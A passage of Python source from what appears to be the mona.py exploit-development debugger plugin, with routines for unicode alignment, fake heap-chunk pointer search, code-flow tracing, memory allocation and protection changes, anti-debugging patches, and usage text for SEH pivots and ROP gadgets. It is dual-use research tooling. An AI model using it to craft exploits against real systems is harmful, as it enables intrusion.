best_result = checkHigherByteBufferRegisterForOverflow(g1, buffer_registers_4_byte_names[0], g2)
xs = [0 for i in range(0,len(originals))]
ys = [0 for i in range(0,len(originals))]
cyclic = getCyclic(originals)
mul = 1
for i in cyclic:
mul *= i
if not silent:
dbg.log("[+] Searching for random solutions for code alignment code in at least %i possibilities..." % mul)
dbg.log(" Bufferregister: %s" % bufferRegister)
dbg.log(" Max time: %d seconds" % timeToRun)
dbg.log("")
#We can't even know the value of AH yet (no, it's NOT g1 for high instruction counts)
cyclic2 = copy.copy(cyclic)
cyclic2[names.index(buffer_registers_4_byte_names[0])] = 9999999
number_of_tries = 0.0
beginning = time.time()
resultFound = False
resultcnt = 0
while time.time()-beginning < timeToRun: #Run only timeToRun seconds!
randomise(xs, cyclic)
randomise(ys, cyclic2)
#[Extra constraint!]
#not allowed: all operations with the bufferRegister,
#because we can not rely on it's values, e.g.
#add al, al
#add al, ah
#add ah, ah
#add ah, al
xs[names.index(buffer_registers_4_byte_names[0])] = 0
xs[names.index(buffer_registers_4_byte_names[1])] = 0
ys[names.index(buffer_registers_4_byte_names[0])] = 0
ys[names.index(buffer_registers_4_byte_names[1])] = 0
tmp = check(originals, names.index(buffer_registers_4_byte_names[0]), [s1, s2], [g1, g2], xs, ys, additionalLength, best_result)
if tmp > 0:
best_result = tmp
#we got a new result
resultFound = True
alignresults[resultcnt] = printNicely(names, buffer_registers_4_byte_names, xs, ys, additionalLength, prefix, postfix)
resultcnt += 1
if not silent:
dbg.log(" Time elapsed so far: %s seconds" % (time.time()-beginning))
dbg.log("")
#Slightly increases probability of resetting with time
probability = MAGIC_PROBABILITY_OF_RESETTING+number_of_tries/(10**8)
if probability < MAGIC_MAX_PROBABILITY_OF_RESETTING:
number_of_tries += 1.0
if random.random() <= probability:
xs = [0 for i in range(0,len(originals))]
ys = [0 for i in range(0,len(originals))]
if not silent:
dbg.log("")
dbg.log(" Done. Total time elapsed: %s seconds" % (time.time()-beginning))
if not resultFound:
dbg.log("")
dbg.log("No results. Please try again (you might want to increase -t)")
dbg.log("")
dbg.log("If you are unsatisfied with the result, run the command again and use the -t option")
dbg.log("")
return alignresults
# end unicode alignment routines
def procHeapCookie(args):
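# Scan writeable pages (skipping ASLR/rebased modules) for byte patterns that could serve as fake heap chunk headers; candidate UserPtr values are written to heapcookie.txt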
# first find all writeable pages
allpages = dbg.getMemoryPages()
filename="heapcookie.txt"
orderedpages = []
cookiemonsters = []
for tpage in allpages.keys():
orderedpages.append(tpage)
orderedpages.sort()
for thispage in orderedpages:
page = allpages[thispage]
page_base = page.getBaseAddress()
page_size = page.getSize()
page_end = page_base + page_size
acl = page.getAccess(human=True)
if "WRITE" in acl:
processpage = True
# don't even bother if page belongs to module that is ASLR/Rebased
pageptr = MnPointer(page_base)
thismodulename = pageptr.belongsTo()
if thismodulename != "":
thismod = MnModule(thismodulename)
if thismod.isAslr or thismod.isRebase:
processpage = False
if processpage:
dbg.log("[+] Walking page 0x%08x - 0x%08x (%s)" % (page_base,page_end,acl))
startptr = page_base # we need to start here
while startptr < page_end-16:
# pointer needs to pass 3 tests
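# test 1: the candidate UserPtr (heap_entry + 8) must be 8-byte aligned
# tests 2 and 3: the byte at heap_entry + 5 (the cookie position) must have bits 0 and 3 set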
try:
heap_entry = startptr
userptr = heap_entry + 0x8
cookieptr = heap_entry + 5
raw_heapcookie = dbg.readMemory(cookieptr,1)
heapcookie = struct.unpack("<B",raw_heapcookie)[0]
hexptr1 = "%08x" % userptr
hexptr2 = "%08x" % heapcookie
a1 = hexStrToInt(hexptr1[6:])
a2 = hexStrToInt(hexptr2[6:])
test1 = False
test2 = False
test3 = False
if (a1 & 7) == 0:
test1 = True
if (a2 & 1) == 1:
test2 = True
if (a2 & 8) == 8:
test3 = True
if test1 and test2 and test3:
cookiemonsters.append(startptr+0x8)
except:
pass
startptr += 1
dbg.log("")
if len(cookiemonsters) > 0:
# write to log
dbg.log("Found %s (fake) UserPtr pointers." % len(cookiemonsters))
all_ptrs = {}
all_ptrs[""] = cookiemonsters
logfile = MnLog(filename)
thislog = logfile.reset()
processResults(all_ptrs,logfile,thislog)
else:
dbg.log("Bad luck, no results.")
return
def procFlags(args):
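# Show the NtGlobalFlag value of the debuggee and decode the individual GFlags that are set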
currentflag = getNtGlobalFlag()
dbg.log("[+] NtGlobalFlag: 0x%08x" % currentflag)
flagvalues = getNtGlobalFlagValues(currentflag)
if len(flagvalues) == 0:
dbg.log(" No GFlags set")
else:
for flagvalue in flagvalues:
dbg.log(" 0x%08x : %s" % (flagvalue,getNtGlobalFlagValueName(flagvalue)))
return
def procEval(args):
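# Evaluate the expression passed on the command line (via getAddyArg) and print the result as a 32-bit value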
# put all args together
argline = ""
if len(currentArgs) > 1:
if __DEBUGGERAPP__ == "WinDBG":
for a in currentArgs[2:]:
argline += a
else:
for a in currentArgs[1:]:
argline += a
argline = argline.replace(" ","")
if argline.replace(" ","") != "":
dbg.log("[+] Evaluating expression '%s'" % argline)
val,valok = getAddyArg(argline)
if valok:
dbg.log(" Result: 0x%08x" % val)
else:
dbg.log(" *** Unable to evaluate expression ***")
else:
dbg.log(" *** No expression found***")
return
def procDiffHeap(args):
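# Save a snapshot of the current heap layout (-before / -after) or diff two previously saved snapshots (-diff)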
global ignoremodules
filenamebefore = "heapstate_before.db"
filenameafter = "heapstate_after.db"
ignoremodules = True
statefilebefore = MnLog(filenamebefore)
thisstatefilebefore = statefilebefore.reset(clear=False)
statefileafter = MnLog(filenameafter)
thisstatefileafter = statefileafter.reset(clear=False)
ignoremodules = False
beforestate = {}
afterstate = {}
#do we want to save states, or diff them?
if not "before" in args and not "after" in args and not "diff" in args:
dbg.log("*** Missing mandatory argument -before, -after or -diff ***", highlight=1)
return
if "diff" in args:
# check if before and after state file exists
if os.path.exists(thisstatefilebefore) and os.path.exists(thisstatefileafter):
# read contents from both states into dict
dbg.log("[+] Reading 'before' state from %s" % thisstatefilebefore)
beforestate = readPickleDict(thisstatefilebefore)
dbg.log("[+] Reading 'after' state from %s" % thisstatefileafter)
afterstate = readPickleDict(thisstatefileafter)
# compare
dbg.log("[+] Diffing heap states...")
else:
if not os.path.exists(thisstatefilebefore):
dbg.log("[-] Oops, unable to find 'before' state file %s" % thisstatefilebefore)
if not os.path.exists(thisstatefileafter):
dbg.log("[-] Oops, unable to find 'after' state file %s" % thisstatefileafter)
return
elif "before" in args:
thisstatefilebefore = statefilebefore.reset(showheader=False)
dbg.log("[+] Enumerating current heap layout, please wait...")
currentstate = getCurrentHeapState()
dbg.log("[+] Saving current heap layout to 'before' heap state file %s" % thisstatefilebefore)
# save dict to file
try:
writePickleDict(thisstatefilebefore, currentstate)
dbg.log("[+] Done")
except:
dbg.log("[-] Error while saving current state to file")
return
elif "after" in args:
thisstatefileafter = statefileafter.reset(showheader=False)
dbg.log("[+] Enumerating current heap layout, please wait...")
currentstate = getCurrentHeapState()
dbg.log("[+] Saving current heap layout to 'after' heap state file %s" % thisstatefileafter)
try:
writePickleDict(thisstatefileafter, currentstate)
dbg.log("[+] Done")
except:
dbg.log("[-] Error while saving current state to file")
return
return
def procFlow(args):
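# Statically walk all code paths starting at -a (default EIP), following jumps and calls up to -n instructions and -cl call levels deep, and write every discovered flow to flows.txt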
srplist = []
endlist = []
cregs = []
cregsc = []
avoidlist = []
endloc = 0
rellist = {}
funcnamecache = {}
branchstarts = {}
maxinstr = 60
maxcalllevel = 3
callskip = 0
instrcnt = 0
regs = dbg.getRegs()
aregs = getAllRegs()
addy = regs["EIP"]
addyerror = False
eaddy = 0
showfuncposition = False
if "cl" in args:
if type(args["cl"]).__name__.lower() != "bool":
try:
maxcalllevel = int(args["cl"])
except:
pass
if "cs" in args:
if type(args["cs"]).__name__.lower() != "bool":
try:
callskip = int(args["cs"])
except:
pass
if "avoid" in args:
if type(args["avoid"]).__name__.lower() != "bool":
try:
avoidl = args["avoid"].replace("'","").replace('"',"").replace(" ","").split(",")
for aa in avoidl:
a,aok = getAddyArg(aa)
if aok:
if not a in avoidlist:
avoidlist.append(a)
except:
pass
if "cr" in args:
if type(args["cr"]).__name__.lower() != "bool":
crdata = args["cr"]
crdata = crdata.replace("'","").replace('"',"").replace(" ","")
crlist = crdata.split(",")
for c in crlist:
c1 = c.upper()
if c1 in aregs:
cregs.append(c1)
csmall = getSmallerRegs(c1)
for cs in csmall:
cregs.append(cs)
if "crc" in args:
if type(args["crc"]).__name__.lower() != "bool":
crdata = args["crc"]
crdata = crdata.replace("'","").replace('"',"").replace(" ","")
crlist = crdata.split(",")
for c in crlist:
c1 = c.upper()
if c1 in aregs:
cregsc.append(c1)
csmall = getSmallerRegs(c1)
for cs in csmall:
cregsc.append(cs)
cregs = list(set(cregs))
cregsc = list(set(cregsc))
if "n" in args:
if type(args["n"]).__name__.lower() != "bool":
try:
maxinstr = int(args["n"])
except:
pass
if "func" in args:
showfuncposition = True
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log(" ** Please provide a valid start location with argument -a **")
return
if "e" in args:
if type(args["e"]).__name__.lower() != "bool":
eaddy,eaddyok = getAddyArg(args["e"])
if not eaddyok:
dbg.log(" ** Please provide a valid end location with argument -e **")
return
dbg.log("[+] Max nr of instructions per branch: %d" % maxinstr)
dbg.log("[+] Maximum CALL level: %d" % maxcalllevel)
if len(avoidlist) > 0:
dbg.log("[+] Only showing flows that don't contains these pointer(s):")
for a in avoidlist:
dbg.log(" 0x%08x" % a)
if callskip > 0:
dbg.log("[+] Skipping details of the first %d child functions" % callskip)
if eaddy > 0:
dbg.log("[+] Searching all possible paths between 0x%08x and 0x%08x" % (addy,eaddy))
else:
dbg.log("[+] Searching all possible paths from 0x%08x" % (addy))
if len(cregs) > 0:
dbg.log("[+] Controlled registers: %s" % cregs)
if len(cregsc) > 0:
dbg.log("[+] Controlled register contents: %s" % cregsc)
# first, get SRPs at this point
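# (saved return pointers taken from the 'k' stack trace, so RET instructions can be followed back to the caller)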
if addy == regs["EIP"]:
cmd2run = "k"
srpdata = dbg.nativeCommand(cmd2run)
for line in srpdata.split("\n"):
linedata = line.split(" ")
if len(linedata) > 1:
childebp = linedata[0]
srp = linedata[1]
if isAddress(childebp) and isAddress(srp):
srplist.append(hexStrToInt(srp))
branchstarts[addy] = [0,srplist,0]
curlocs = [addy]
# create relations
while len(curlocs) > 0:
curloc = curlocs.pop(0)
callcnt = 0
#dbg.log("New start location: 0x%08x" % curloc)
prevloc = curloc
instrcnt = branchstarts[curloc][0]
srplist = branchstarts[curloc][1]
currcalllevel = branchstarts[curloc][2]
while instrcnt < maxinstr:
beforeloc = prevloc
prevloc = curloc
try:
thisopcode = dbg.disasm(curloc)
instruction = getDisasmInstruction(thisopcode)
instructionbytes = thisopcode.getBytes()
instructionsize = thisopcode.opsize
opupper = instruction.upper()
if opupper.startswith("RET"):
if currcalllevel > 0:
currcalllevel -= 1
if len(srplist) > 0:
newloc = srplist.pop(0)
rellist[curloc] = [newloc]
curloc = newloc
else:
break
elif opupper.startswith("JMP"):
if "(" in opupper and ")" in opupper:
ipartsa = opupper.split(")")
ipartsb = ipartsa[0].split("(")
if len(ipartsb) > 0:
jmptarget = ipartsb[1]
if isAddress(jmptarget):
newloc = hexStrToInt(jmptarget)
rellist[curloc] = [newloc]
curloc = newloc
elif opupper.startswith("J"):
if "(" in opupper and ")" in opupper:
ipartsa = opupper.split(")")
ipartsb = ipartsa[0].split("(")
if len(ipartsb) > 0:
jmptarget = ipartsb[1]
if isAddress(jmptarget):
newloc = hexStrToInt(jmptarget)
if not newloc in curlocs:
curlocs.append(newloc)
branchstarts[newloc] = [instrcnt,srplist,currcalllevel]
newloc2 = prevloc + instructionsize
rellist[curloc] = [newloc,newloc2]
curloc = newloc2
#dbg.log(" Added 0x%08x as alternative branch start" % newloc)
elif opupper.startswith("CALL"):
if ("(" in opupper and ")" in opupper) and currcalllevel < maxcalllevel and callcnt > callskip:
ipartsa = opupper.split(")")
ipartsb = ipartsa[0].split("(")
if len(ipartsb) > 0:
jmptarget = ipartsb[1]
if isAddress(jmptarget):
newloc = hexStrToInt(jmptarget)
rellist[curloc] = [newloc]
curloc = newloc
newretptr = prevloc + instructionsize
srplist.insert(0,newretptr)
currcalllevel += 1
else:
# don't show the function details, simply continue after the call
newloc = curloc+instructionsize
rellist[curloc] = [newloc]
curloc = newloc
callcnt += 1
else:
curloc += instructionsize
rellist[prevloc] = [curloc]
except:
#dbg.log("Unable to disasm at 0x%08x, past: 0x%08x" % (curloc,beforeloc))
if not beforeloc in endlist:
endlist.append(beforeloc)
instrcnt = maxinstr
break
#dbg.log("%d 0x%08x : %s -> 0x%08x" % (instrcnt,prevloc,instruction,curloc))
instrcnt += 1
if not curloc in endlist:
endlist.append(curloc)
dbg.log("[+] Found total of %d possible flows" % len(endlist))
if eaddy > 0:
if eaddy in rellist:
endlist = [eaddy]
dbg.log("[+] Limit flows to cases that contain 0x%08x" % eaddy)
else:
dbg.log(" ** Unable to reach 0x%08x ** " % eaddy)
dbg.log(" Try increasing max nr of instructions with parameter -n")
return
filename = "flows.txt"
logfile = MnLog(filename)
thislog = logfile.reset()
dbg.log("[+] Processing %d endings" % len(endlist))
endingcnt = 1
processedresults = []
for endaddy in endlist:
dbg.log("[+] Creating all paths between 0x%08x and 0x%08x" % (addy,endaddy))
allpaths = findAllPaths(rellist,addy,endaddy)
if len(allpaths) == 0:
#dbg.log(" *** No paths from 0x%08x to 0x%08x *** " % (addy,endaddy))
continue
dbg.log("[+] Ending: 0x%08x (%d/%d), %d paths" % (endaddy,endingcnt,len(endlist), len(allpaths)))
endingcnt += 1
for p in allpaths:
if p in processedresults:
dbg.log(" > Skipping duplicate path from 0x%08x to 0x%08x" % (addy,endaddy))
else:
processedresults.append(p)
skipthislist = False
logl = "Path from 0x%08x to 0x%08x (%d instructions) :" % (addy,endaddy,len(p))
if len(avoidlist) > 0:
for a in avoidlist:
if a in p:
dbg.log(" > Skipping path, contains 0x%08x (which should be avoided)"%a)
skipthislist = True
break
if not skipthislist:
logfile.write("\n",thislog)
logfile.write(logl,thislog)
logfile.write("-" * len(logl),thislog)
dbg.log(" > Simulating path from 0x%08x to 0x%08x (%d instructions)" % (addy,endaddy,len(p)))
cregsb = []
for c in cregs:
cregsb.append(c)
cregscb = []
for c in cregsc:
cregscb.append(c)
prevfname = ""
fname = ""
foffset = ""
previnstruction = ""
for thisaddy in p:
if showfuncposition:
if previnstruction == "" or previnstruction.startswith("RET") or previnstruction.startswith("J") or previnstruction.startswith("CALL"):
if not thisaddy in funcnamecache:
fname,foffset = getFunctionName(thisaddy)
funcnamecache[thisaddy] = [fname,foffset]
else:
fname = funcnamecache[thisaddy][0]
foffset = funcnamecache[thisaddy][1]
if fname != prevfname:
prevfname = fname
locname = fname
if foffset != "":
locname += "+%s" % foffset
logfile.write("#--- %s ---" % locname,thislog)
#dbg.log("%s" % locname)
thisopcode = dbg.disasm(thisaddy)
instruction = getDisasmInstruction(thisopcode)
previnstruction = instruction
clist = []
clistc = []
for c in cregsb:
combins = []
combins.append(" %s" % c)
combins.append("[%s" % c)
combins.append(",%s" % c)
combins.append("%s]" % c)
combins.append("%s-" % c)
combins.append("%s+" % c)
combins.append("-%s" % c)
combins.append("+%s" % c)
for comb in combins:
if comb in instruction and not c in clist:
clist.append(c)
for c in cregscb:
combins = []
combins.append(" %s" % c)
combins.append("[%s" % c)
combins.append(",%s" % c)
combins.append("%s]" % c)
combins.append("%s-" % c)
combins.append("%s+" % c)
combins.append("-%s" % c)
combins.append("+%s" % c)
for comb in combins:
if comb in instruction and not c in clistc:
clistc.append(c)
rsrc,rdst = getSourceDest(instruction)
csource = False
cdest = False
if rsrc in cregsb or rsrc in cregscb:
csource = True
if rdst in cregsb or rdst in cregscb:
cdest = True
destructregs = ["MOV","XOR","OR"]
writeregs = ["INC","DEC","AND"]
ocregsb = copy.copy(cregsb)
if not instruction.startswith("TEST") and not instruction.startswith("CMP"):
for d in destructregs:
if instruction.startswith(d):
sourcefound = False
sourcereg = ""
destfound = False
destreg = ""
for s in clist:
for sr in rsrc:
if s in sr and not sourcefound:
sourcefound = True
sourcereg = s
for sr in rdst:
if s in sr and not destfound:
destfound = True
destreg = s
if sourcefound and destfound:
if not destreg in cregsb:
cregsb.append(destreg)
if destfound and not sourcefound:
sregs = getSmallerRegs(destreg)
if destreg in cregsb:
cregsb.remove(destreg)
for s in sregs:
if s in cregsb:
cregsb.remove(s)
break
#else:
#dbg.log(" Control: %s" % ocregsb)
logfile.write("0x%08x : %s" % (thisaddy,instruction),thislog)
#if len(cregs) > 0 or len(cregsb) > 0:
# if cmp(ocregsb,cregsb) == -1:
# dbg.log(" Before: %s" % ocregsb)
# dbg.log(" After : %s" % cregsb)
return
def procChangeACL(args):
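# Change the memory protection of the page at -a to the constant given with -acl (the page is re-committed with the desired protection)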
size = 1
addy = 0
acl = ""
addyerror = False
aclerror = False
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
addyerror = True
if "acl" in args:
if type(args["acl"]).__name__.lower() != "bool":
if args["acl"].upper() in memProtConstants:
acl = args["acl"].upper()
else:
aclerror = True
else:
aclerror = True
if addyerror:
dbg.log(" *** Please specify a valid address to argument -a ***")
if aclerror:
dbg.log(" *** Please specify a valid memory protection constant with -acl ***")
dbg.log(" *** Valid values are :")
for acltype in memProtConstants:
dbg.log(" %s (%s = 0x%02x)" % (toSize(acltype,10),memProtConstants[acltype][0],memProtConstants[acltype][1]))
if not addyerror and not aclerror:
pageacl = memProtConstants[acl][1]
pageaclname = memProtConstants[acl][0]
dbg.log("[+] Current ACL: %s" % getPointerAccess(addy))
dbg.log("[+] Desired ACL: %s (0x%02x)" % (pageaclname,pageacl))
retval = dbg.rVirtualAlloc(addy,1,0x1000,pageacl)
return
def procToBp(args):
"""
Generate WinDBG syntax to create a logging breakpoint on a given location
"""
addy = 0
addyerror = False
executenow = False
locsyntax = ""
regsyntax = ""
poisyntax = ""
dmpsyntax = ""
instructionparts = []
global silent
oldsilent = silent
regs = dbg.getRegs()
silent = True
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
addyerror = True
else:
addy = regs["EIP"]
if "e" in args:
executenow = True
if addyerror:
dbg.log(" *** Please provide a valid address with argument -a ***",highlight=1)
return
# get RVA for addy (or absolute address if addy is not part of a module)
bpdest = "0x%08x" % addy
instruction = ""
ptrx = MnPointer(addy)
modname = ptrx.belongsTo()
if not modname == "":
mod = MnModule(modname)
m = mod.moduleBase
rva = addy - m
bpdest = "%s+0x%02x" % (modname,rva)
thisopcode = dbg.disasm(addy)
instruction = getDisasmInstruction(thisopcode)
locsyntax = "bp %s" % bpdest
instructionparts = multiSplit(instruction,[" ",","])
usedregs = []
for reg in regs:
for ipart in instructionparts:
if reg.upper() in ipart.upper():
usedregs.append(reg)
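# build the .printf body of the breakpoint: log every register used by the instruction; memory operands are also dereferenced and dumped with dds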
if len(usedregs) > 0:
regsyntax = '.printf \\"'
argsyntax = ""
for ipart in instructionparts:
for reg in regs:
if reg.upper() in ipart.upper():
if "[" in ipart:
regsyntax += ipart.replace("[","").replace("]","")
regsyntax += ": 0x%08x, "
argsyntax += "%s," % ipart.replace("[","").replace("]","")
regsyntax += ipart
regsyntax += ": 0x%08x, "
argsyntax += "%s," % ipart.replace("[","poi(").replace("]",")")
iparttxt = ipart.replace("[","").replace("]","")
dmpsyntax += ".echo;.echo %s:;dds %s L 0x24/4;" % (iparttxt,iparttxt)
else:
regsyntax += ipart
regsyntax += ": 0x%08x, "
argsyntax += "%s," % ipart
argsyntax = argsyntax.strip(",")
regsyntax = regsyntax.strip(", ")
regsyntax += '\\",%s;' % argsyntax
if "CALL" in instruction.upper():
dmpsyntax += '.echo;.printf \\"Stack (esp: 0x%08x):\\",esp;.echo;dds esp L 0x4;'
if instruction.upper().startswith("RET"):
dmpsyntax += '.echo;.printf \\"EAX: 0x%08x, Ret To: 0x%08x, Arg1: 0x%08x, Arg2: 0x%08x, Arg3: 0x%08x, Arg4: 0x%08x\\",eax,poi(esp),poi(esp+4),poi(esp+8),poi(esp+c),poi(esp+10);'
bpsyntax = locsyntax + ' ".echo ---------------;u eip L 1;' + regsyntax + dmpsyntax + ".echo;g" + '"'
filename = "logbps.txt"
logfile = MnLog(filename)
thislog = logfile.reset(False,False)
with open(thislog, "a") as fh:
fh.write(bpsyntax + "\n")
silent = oldsilent
dbg.log("%s" % bpsyntax)
dbg.log("Updated %s" % thislog)
if executenow:
dbg.nativeCommand(bpsyntax)
dbg.log("> Breakpoint set at 0x%08x" % addy)
return
def procAllocMem(args):
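# Allocate (and optionally fill) memory in the debuggee: -s size, -a preferred address, -acl protection, -b fill byte, -fill/-force to actually write the fill byte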
size = 0x1000
addy = 0
sizeerror = False
addyerror = False
byteerror = False
fillup = False
writemore = False
fillbyte = "A"
acl = "RWX"
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
sval = args["s"]
if sval.lower().startswith("0x"):
try:
size = int(sval,16)
except:
sizeerror = True
else:
try:
size = int(sval)
except:
sizeerror = True
else:
sizeerror = True
if "b" in args:
if type(args["b"]).__name__.lower() != "bool":
try:
fillbyte = hex2bin(args["b"])[0]
except:
dbg.log(" *** Invalid byte specified with -b ***")
byteerror = True
if size < 0x1:
sizeerror = True
dbg.log(" *** Minimum size is 0x1 bytes ***",highlight=1)
if "a" in args:
if type(args["a"]).__name__.lower() != "bool":
addy,addyok = getAddyArg(args["a"])
if not addyok:
addyerror = True
if "fill" in args:
fillup = True
if "force" in args:
writemore = True
aclerror = False
if "acl" in args:
if type(args["acl"]).__name__.lower() != "bool":
if args["acl"].upper() in memProtConstants:
acl = args["acl"].upper()
else:
aclerror = True
dbg.log(" *** Please specify a valid memory protection constant with -acl ***")
dbg.log(" *** Valid values are :")
for acltype in memProtConstants:
dbg.log(" %s (%s = 0x%02x)" % (toSize(acltype,10),memProtConstants[acltype][0],memProtConstants[acltype][1]))
if addyerror:
dbg.log(" *** Please specify a valid address with -a ***",highlight=1)
if sizeerror:
dbg.log(" *** Please specify a valid size with -s ***",highlight = 1)
if not addyerror and not sizeerror and not byteerror and not aclerror:
dbg.log("[+] Requested allocation size: 0x%08x (%d) bytes" % (size,size))
if addy > 0:
dbg.log("[+] Desired target location : 0x%08x" % addy)
pageacl = memProtConstants[acl][1]
pageaclname = memProtConstants[acl][0]
if addy > 0:
dbg.log(" Current page ACL: %s" % getPointerAccess(addy))
dbg.log(" Desired page ACL: %s (0x%02x)" % (pageaclname,pageacl))
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
allocat = dbg.rVirtualAlloc(addy,size,0x1000,pageacl)
if addy == 0 and allocat > 0:
retval = dbg.rVirtualProtect(allocat,1,pageacl)
else:
retval = dbg.rVirtualProtect(addy,1,pageacl)
dbg.log("[+] Allocated memory at 0x%08x" % allocat)
#if allocat > 0:
# dbg.log(" ACL 0x%08x: %s" % (allocat,getPointerAccess(allocat)))
#else:
# dbg.log(" ACL 0x%08x: %s" % (addy,getPointerAccess(addy)))
if allocat == 0 and fillup and not writemore:
dbg.log("[+] It looks like the page was already mapped. Use the -force argument")
dbg.log(" to make me write to 0x%08x anyway" % addy)
if (allocat > 0 and fillup) or (writemore and fillup):
loc = 0
written = 0
towrite = size
while loc < towrite:
try:
dbg.writeMemory(addy+loc,fillbyte)
written += 1
except:
pass
loc += 1
dbg.log("[+] Wrote %d times \\x%s to chunk at 0x%08x" % (written,bin2hex(fillbyte),addy))
return
def procHideDebug(args):
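# Hide the debugger from common anti-debugging tricks: patch PEB flags and hook UnhandledExceptionFilter, CheckRemoteDebuggerPresent, GetTickCount and ZwQuerySystemInformation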
peb = dbg.getPEBAddress()
dbg.log("[+] Patching PEB (0x%08x)" % peb)
if peb == 0:
dbg.log("** Unable to find PEB **")
return
isdebugged = struct.unpack('<B',dbg.readMemory(peb + 0x02,1))[0]
processheapflag = dbg.readLong(peb + 0x18)
processheapflag += 0x10
processheapvalue = dbg.readLong(processheapflag)
ntglobalflag = dbg.readLong(peb + 0x68)
dbg.log(" Patching PEB.IsDebugged : 0x%x -> 0x%x" % (isdebugged,0))
dbg.writeMemory(peb + 0x02, '\x00')
dbg.log(" Patching PEB.ProcessHeap.Flag : 0x%x -> 0x%x" % (processheapvalue,0))
dbg.writeLong(processheapflag,0)
dbg.log(" Patching PEB.NtGlobalFlag : 0x%x -> 0x%x" % (ntglobalflag,0))
dbg.writeLong(peb + 0x68, 0)
dbg.log(" Patching PEB.LDR_DATA Fill pattern")
a = dbg.readLong(peb + 0xc)
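# scan from the PEB.Ldr pointer onwards and zero out consecutive 0xFEEEFEEE fill dwords (debugger heap fill pattern)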
while a != 0:
a += 1
try:
b = dbg.readLong(a)
c = dbg.readLong(a + 4)
if (b == 0xFEEEFEEE) and (c == 0xFEEEFEEE):
dbg.writeLong(a,0)
dbg.writeLong(a + 4,0)
a += 7
except:
break
uef = dbg.getAddress("kernel32.UnhandledExceptionFilter")
if uef > 0:
dbg.log("[+] Patching kernel32.UnhandledExceptionFilter (0x%08x)" % uef)
uef += 0x86
dbg.writeMemory(uef, dbg.assemble(" \
PUSH EDI \
"))
else:
dbg.log("[-] Failed to hook kernel32.UnhandledExceptionFilter (0x%08x)")
remdebpres = dbg.getAddress("kernel32.CheckRemoteDebuggerPresent")
if remdebpres > 0:
dbg.log("[+] Patching CheckRemoteDebuggerPresent (0x%08x)" % remdebpres)
dbg.writeMemory( remdebpres, dbg.assemble( " \
MOV EDI, EDI \n \
PUSH EBP \n \
MOV EBP, ESP \n \
MOV EAX, [EBP + C] \n \
PUSH 0 \n \
POP [EAX] \n \
XOR EAX, EAX \n \
POP EBP \n \
RET 8 \
" ) )
else:
dbg.log("[-] Unable to patch CheckRemoteDebuggerPresent")
gtc = dbg.getAddress("kernel32.GetTickCount")
if gtc > 0:
dbg.log("[+] Patching GetTickCount (0x%08x)" % gtc)
patch = dbg.assemble("MOV EDX, 0x7FFE0000") + Poly_ReturnDW(0x0BADF00D) + dbg.assemble("Ret")
while len(patch) > 0x0F:
patch = dbg.assemble("MOV EDX, 0x7FFE0000") + Poly_ReturnDW(0x0BADF00D) + dbg.assemble("Ret")
dbg.writeMemory( gtc, patch )
else:
dbg.log("[-] Unable to pach GetTickCount")
zwq = dbg.getAddress("ntdll.ZwQuerySystemInformation")
if zwq > 0:
dbg.log("[+] Patching ZwQuerySystemInformation (0x%08x)" % zwq)
isPatched = False
a = 0
s = 0
while a < 3:
a += 1
s += dbg.disasmSizeOnly(zwq + s).opsize
FakeCode = dbg.readMemory(zwq, 1) + "\x78\x56\x34\x12" + dbg.readMemory(zwq + 5, 1)
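# an already patched function starts with 'PUSH <address> / RET'; rebuild that pattern (with a dummy address) to detect double patching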
if FakeCode == dbg.assemble("PUSH 0x12345678\nRET"):
isPatched = True
a = dbg.readLong(zwq+1)
i = 0
s = 0
while i < 3:
i += 1
s += dbg.disasmSizeOnly(a+s).opsize
if isPatched:
dbg.log(" Function was already patched.")
else:
a = dbg.remoteVirtualAlloc(size=0x1000)
if a > 0:
dbg.log(" Writing instructions to 0x%08x" % a)
dbg.writeMemory(a, dbg.readMemory(zwq,s))
pushCode = dbg.assemble("PUSH 0x%08x" % (zwq + s))
patchCode = "\x83\x7c\x24\x08\x07" # CMP [ESP+8],7
patchCode += "\x74\x06"
patchCode += pushCode
patchCode += "\xC3" # RETN
patchCode += "\x8B\x44\x24\x0c" # MOV EAX,[ESP+0x0c]
patchCode += "\x6a\x00" # PUSH 0
patchCode += "\x8f\x00" # POP [EAX]
patchCode += "\x33\xC0" # XOR EAX,EAX
patchCode += "\xC2\x14\x00" # RETN 14
dbg.writeMemory( a + s, patchCode)
# redirect function
dbg.writeMemory( zwq, dbg.assemble( "PUSH 0x%08X\nRET" % a) )
else:
dbg.log(" ** Unable to allocate memory in target process **")
else:
dbg.log("[-] Unable to patch ZwQuerySystemInformation")
return
# ----- Finally, some main stuff ----- #
# All available commands and their Usage :
sehUsage = """Default module criteria : non safeseh, non aslr, non rebase
This function will retrieve all stackpivot pointers that will bring you back to nseh in an SEH overwrite exploit
Optional argument:
-all : also search outside of loaded modules"""
configUsage = """Change config of mona.py
Available options are : -get <parameter>, -set <parameter> <value> or -add <parameter> <value_to_add>
Valid parameters are : workingfolder, excluded_modules, author"""
jmpUsage = """Default module criteria : non aslr, non rebase
Mandatory argument : -r <reg> where reg is a valid register"""
ropfuncUsage = """Default module criteria : non aslr, non rebase, non os
Output will be written to ropfunc.txt"""
modulesUsage = """Shows information about the loaded modules"""
ropUsage="""Default module criteria : non aslr,non rebase,non os
Optional parameters :
-offset <value> : define the maximum offset for RET instructions (integer, default : 40)
-distance <value> : define the minimum distance for stackpivots (integer, default : 8).
If you want to specify a min and max distance, set the value to min,max
-depth <value> : define the maximum nr of instructions (not ending instruction) in each gadget (integer, default : 6)
-split : write gadgets to individual files, grouped by the module the gadget belongs to
-fast : skip the 'non-interesting' gadgets
-end <instruction(s)> : specify one or more instructions that will be used as chain end.
(Separate instructions with #). Default ending is RETN
-f \"file1,file2,..filen\" : use mona generated rop files as input instead of searching in memory
-rva : use RVA's in rop chain"""
jopUsage="""Default module criteria : non aslr,non rebase,non os
Optional parameters :
-depth <value> : define the maximum nr of instructions (not ending instruction) in each gadget (integer, default : 8)"""
stackpivotUsage="""Default module criteria : non aslr,non rebase,non os
Optional parameters :
-offset <value> : define the maximum offset for RET instructions (integer, default : 40)
-distance <value> : define the minimum distance for stackpivots (integer, default : 8)
If you want to specify a min and max distance, set the value to min,max
-depth <value> : define the maximum nr of instructions (not ending instruction) in each gadget (integer, default : 6)"""
